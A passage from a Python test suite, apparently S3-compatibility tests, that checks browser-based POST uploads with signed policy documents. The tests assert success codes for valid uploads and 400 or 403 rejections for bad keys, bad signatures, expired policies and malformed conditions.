("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request, no content-type header')
@attr(assertion='succeeds and returns written data')
def test_post_object_authenticated_no_content_type():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key="foo.txt")
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request, bad access key')
@attr(assertion='fails')
def test_post_object_authenticated_request_bad_access_key():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , 'foo'),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='anonymous browser based upload via POST request')
@attr(assertion='succeeds with status 201')
def test_post_object_set_success_code():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
payload = OrderedDict([("key" , "foo.txt"),("acl" , "public-read"),\
("success_action_status" , "201"),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 201)
message = ET.fromstring(r.content).find('Key')
eq(message.text,'foo.txt')
@attr(resource='object')
@attr(method='post')
@attr(operation='anonymous browser based upload via POST request')
@attr(assertion='succeeds with status 204')
def test_post_object_set_invalid_success_code():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
payload = OrderedDict([("key" , "foo.txt"),("acl" , "public-read"),\
("success_action_status" , "404"),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
content = r.content.decode()
eq(content,'')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
def test_post_object_upload_larger_than_chunk():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 5*1024*1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
foo_string = 'foo' * 1024*1024
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', foo_string)])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, foo_string)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
def test_post_object_set_key_from_filename():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "${filename}"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('foo.txt', 'bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds with status 204')
def test_post_object_ignored_header():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),("x-ignore-foo" , "bar"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds with status 204')
def test_post_object_case_insensitive_condition_fields():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bUcKeT": bucket_name},\
["StArTs-WiTh", "$KeY", "foo"],\
{"AcL": "private"},\
["StArTs-WiTh", "$CoNtEnT-TyPe", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
foo_string = 'foo' * 1024*1024
payload = OrderedDict([ ("kEy" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("aCl" , "private"),("signature" , signature),("pOLICy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds with escaped leading $ and returns written data')
def test_post_object_escaped_field_values():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "\$foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='\$foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns redirect url')
def test_post_object_success_redirect_action():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
url = _get_post_url(bucket_name)
redirect_url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["eq", "$success_action_redirect", redirect_url],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),("success_action_redirect" , redirect_url),\
('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 200)
url = r.url
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
eq(url,
'{rurl}?bucket={bucket}&key={key}&etag=%22{etag}%22'.format(rurl = redirect_url,\
bucket = bucket_name, key = 'foo.txt', etag = response['ETag'].strip('"')))
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with invalid signature error')
def test_post_object_invalid_signature():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())[::-1]
payload = OrderedDict([ ("key" , "\$foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with access key does not exist error')
def test_post_object_invalid_access_key():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "\$foo.txt"),("AWSAccessKeyId" , aws_access_key_id[::-1]),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with invalid expiration error')
def test_post_object_invalid_date_format():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": str(expires),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "\$foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with missing key error')
def test_post_object_no_key_specified():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with missing signature error')
def test_post_object_missing_signature():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with extra input fields policy error')
def test_post_object_missing_policy_condition():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
["starts-with", "$key", "\$foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds using starts-with restriction on metadata header')
def test_post_object_user_specified_header():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
["starts-with", "$x-amz-meta-foo", "bar"]
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('x-amz-meta-foo' , 'barclamp'),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
eq(response['Metadata']['foo'], 'barclamp')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with policy condition failed error due to missing field in POST request')
def test_post_object_request_missing_policy_specified_field():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
["starts-with", "$x-amz-meta-foo", "bar"]
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with conditions must be list error')
def test_post_object_condition_is_case_sensitive():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"CONDITIONS": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with expiration must be string error')
def test_post_object_expires_is_case_sensitive():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"EXPIRATION": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with policy expired error')
def test_post_object_expired_policy():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=-6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key", "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails using equality restriction on metadata header')
def test_post_object_invalid_request_field_value():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
["eq", "$x-amz-meta-foo", ""]
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('x-amz-meta-foo' , 'barclamp'),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 403)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with policy missing expiration error')
def test_post_object_missing_expires_condition():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with policy missing conditions error')
def test_post_object_missing_conditions_list():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ")}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with allowable upload size exceeded error')
def test_post_object_upload_size_limit_exceeded():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
